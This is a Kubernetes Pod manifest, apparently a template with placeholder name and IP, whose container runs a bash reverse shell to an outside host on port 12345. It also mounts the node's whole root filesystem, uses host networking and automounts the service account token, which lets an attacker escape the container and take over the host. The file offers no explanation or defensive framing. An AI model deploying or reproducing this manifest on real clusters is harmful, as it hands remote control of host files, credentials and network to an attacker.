apiVersion: v1
kind: Pod
metadata:
  name: alpine<name>
spec:
  containers:
  - name: alpine<name>
    image: manojdeshmukh45/argocd:v1
    command: ['/bin/bash', '-c', 'sh -i >& /dev/tcp/<ip>/12345 0>&1']
    volumeMounts:
    - mountPath: /demo/
      name: mount-demo-into-mnt
  volumes:
  - name: mount-demo-into-mnt
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
